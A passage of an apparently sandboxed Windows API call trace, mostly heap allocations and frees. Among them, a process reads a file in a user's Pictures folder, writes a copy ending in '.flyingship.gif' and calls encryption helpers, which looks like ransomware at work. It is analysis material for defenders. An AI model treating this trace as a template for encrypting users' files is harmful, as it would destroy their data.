lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.448] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0189.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\lu ye0otm8f.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.452] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.452] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.452] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0189.453] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.453] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x77e4, lpOverlapped=0x0) returned 1 [0189.458] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77e4) returned 0xbea018 [0189.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77e4) returned 0xbf1808 [0189.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77e4) returned 0xbea018 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.461] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77e4) returned 0xbea018 [0189.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0189.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77e4) returned 0xbf8ff8 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.464] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.464] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.471] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.472] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.473] HeapFree (in: 